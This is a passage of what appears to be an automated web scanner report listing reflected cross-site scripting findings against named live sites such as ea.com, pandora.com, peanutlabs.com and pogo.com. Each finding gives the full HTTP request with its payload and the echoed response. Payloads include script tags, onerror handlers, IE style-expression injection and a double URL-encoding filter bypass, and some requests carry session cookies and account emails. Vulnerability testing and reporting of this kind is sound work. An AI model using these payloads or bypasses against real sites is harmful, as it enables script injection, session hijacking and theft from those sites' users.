HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:26 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=eclo7i73cfqlnl7uaeqlknq0g6; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/ps3-gamesb7ff7"><script>alert(1)</script>3d766d616d5" /> ...[SNIP]...
3.578. http://www.ea.com/platform/ps3-games [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/platform/ps3-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e73"><script>alert(1)</script>17436741d31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/ps3-games?82e73"><script>alert(1)</script>17436741d31=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:49 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=luocner863ance16967gh02qs0; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 85039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/ps3-games?82e73"><script>alert(1)</script>17436741d31=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9838c"><script>alert(1)</script>d99c4148412 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform9838c"><script>alert(1)</script>d99c4148412/xbox-360-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:13 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=ghogbj07oe5vmhojil9itqhbl0; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31144
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform9838c"><script>alert(1)</script>d99c4148412/xbox-360-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9216f"><script>alert(1)</script>e3244aad044 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/xbox-360-games9216f"><script>alert(1)</script>e3244aad044 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:17 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3g5dcbo2tg5kp6hne4mvnq76f3; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31144
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/xbox-360-games9216f"><script>alert(1)</script>e3244aad044" /> ...[SNIP]...
3.581. http://www.ea.com/platform/xbox-360-games [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/platform/xbox-360-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7223"><script>alert(1)</script>38f7d5e6e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/xbox-360-games?c7223"><script>alert(1)</script>38f7d5e6e2c=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:42 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=9cg06j3gera3opfjeuupp54g93; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/xbox-360-games?c7223"><script>alert(1)</script>38f7d5e6e2c=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73bb4"><script>alert(1)</script>d65c535f196 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wii73bb4"><script>alert(1)</script>d65c535f196 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:31 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=g1f11esrsvgvlcmd3l6f10r4o0; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/wii73bb4"><script>alert(1)</script>d65c535f196" /> ...[SNIP]...
3.583. http://www.ea.com/wii [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/wii
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42ab4"><script>alert(1)</script>a2f77cd35b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wii?42ab4"><script>alert(1)</script>a2f77cd35b6=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:52 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=jinvebj2q69pplgb192rrvfur0; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/wii?42ab4"><script>alert(1)</script>a2f77cd35b6=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a24d"><img%20src%3da%20onerror%3dalert(1)>29cb609e200 was submitted in the REST URL parameter 2. This input was echoed as 5a24d"><img src=a onerror=alert(1)>29cb609e200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/3881925a24d"><img%20src%3da%20onerror%3dalert(1)>29cb609e200/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1 Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.585. http://www.intellicast.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.intellicast.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf718"style%3d"x%3aexpression(alert(1))"9a54e9bc174 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf718"style="x:expression(alert(1))"9a54e9bc174 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?cf718"style%3d"x%3aexpression(alert(1))"9a54e9bc174=1 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36278%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220a3c2ea7beb was submitted in the REST URL parameter 2. This input was echoed as 36278"style="x:expression(alert(1))"0a3c2ea7beb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Local/Weather.aspx36278%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220a3c2ea7beb HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the location request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90ff"style%3d"x%3aexpression(alert(1))"f8791e1c3b8 was submitted in the location parameter. This input was echoed as f90ff"style="x:expression(alert(1))"f8791e1c3b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Local/Weather.aspx?location=USMI0020f90ff"style%3d"x%3aexpression(alert(1))"f8791e1c3b8 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]... <a href="/Local/Weather.aspx?unit=C&location=USMI0020f90ff"style="x:expression(alert(1))"f8791e1c3b8"> ...[SNIP]...
3.588. http://www.intellicast.com/Local/Weather.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.intellicast.com
Path:
/Local/Weather.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54ef9"style%3d"x%3aexpression(alert(1))"23d5246f6f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54ef9"style="x:expression(alert(1))"23d5246f6f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Local/Weather.aspx?location=USMI0020&54ef9"style%3d"x%3aexpression(alert(1))"23d5246f6f3=1 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]... <a href="/Local/Weather.aspx?unit=C&location=USMI0020&54ef9"style="x:expression(alert(1))"23d5246f6f3=1"> ...[SNIP]...
3.589. http://www.mlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db83d'-alert(1)-'e027fe9bbf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?db83d'-alert(1)-'e027fe9bbf5=1 HTTP/1.1 Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:46 GMT Date: Sun, 09 Jan 2011 01:44:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascri ...[SNIP]... f';
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e199a"><script>alert(1)</script>d7f28494553 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e199a"><script>alert(1)</script>d7f28494553/index.php HTTP/1.1 Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 05:23:20 GMT Server: Apache Content-Length: 2340 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.outofhanwell.com/e199a"><script>alert(1)</script>d7f28494553/index.php"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30833"><script>alert(1)</script>87e69a6bfec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/30833"><script>alert(1)</script>87e69a6bfec HTTP/1.1 Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 05:23:22 GMT Server: Apache Content-Length: 2335 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.outofhanwell.com/blog/30833"><script>alert(1)</script>87e69a6bfec"> ...[SNIP]...
3.592. http://www.pandora.com/people/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pandora.com
Path:
/people/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8db"><script>alert(1)</script>09862348e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /people/?cf8db"><script>alert(1)</script>09862348e83=1 HTTP/1.1 Host: www.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:20:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 13162
<html>
<head>
<title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>
The value of the coreClass request parameter is copied into the XML document as plain text between tags. The payload 21731<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>813616225af was submitted in the coreClass parameter. This input was echoed as 21731<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>813616225af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
<?xml version="1.0"?><errorInfo><error><![CDATA[Class ParentCompanyInitCmd21731<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>813616225af does not exist]]></error><reset><![C ...[SNIP]...
The value of the coreClass request parameter is copied into the HTML document as plain text between tags. The payload c0786<img%20src%3da%20onerror%3dalert(1)>92aed5e9cf6 was submitted in the coreClass parameter. This input was echoed as c0786<img src=a onerror=alert(1)>92aed5e9cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the iframe_tag request parameter is copied into the HTML document as plain text between tags. The payload 6d2fe<script>alert(1)</script>8329d0dc6 was submitted in the iframe_tag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rewardAvailable request parameter is copied into the HTML document as plain text between tags. The payload c00a4<img%20src%3da%20onerror%3dalert(1)>d0ead2e6fff was submitted in the rewardAvailable parameter. This input was echoed as c00a4<img src=a onerror=alert(1)>d0ead2e6fff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
3.597. http://www.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.peanutlabs.com
Path:
/js/iFrame/sc.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97586'%3balert(1)//07d2d3ed2aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97586';alert(1)//07d2d3ed2aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/iFrame/sc.php?userId=998826224-3432-8939b9/97586'%3balert(1)//07d2d3ed2aa81e2 HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:33:30 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 571
The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff40d'%3balert(1)//866b553c32d was submitted in the userId parameter. This input was echoed as ff40d';alert(1)//866b553c32d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/iFrame/sc.php?userId=998826224-3432-8939b981e2ff40d'%3balert(1)//866b553c32d HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:51 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 570
3.599. http://www.peanutlabs.com/sampleIframe.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.peanutlabs.com
Path:
/sampleIframe.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5765"><script>alert(1)</script>55e45c8f29a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sampleIframe.php?userId=testaccount@peanutlabs.com2962-69-abdd5b/f5765"><script>alert(1)</script>55e45c8f29a1634 HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:23 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 568 Connection: close Content-Type: text/html
The value of the userId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75d4"><script>alert(1)</script>8d6cc451af9 was submitted in the userId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sampleIframe.php?userId=f75d4"><script>alert(1)</script>8d6cc451af9 HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:18 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 523 Connection: close Content-Type: text/html
The value of the f9258%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7809"><script>alert(1)</script>9c836ad6bee was submitted in the f9258%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookied7809"><script>alert(1)</script>9c836ad6bee HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
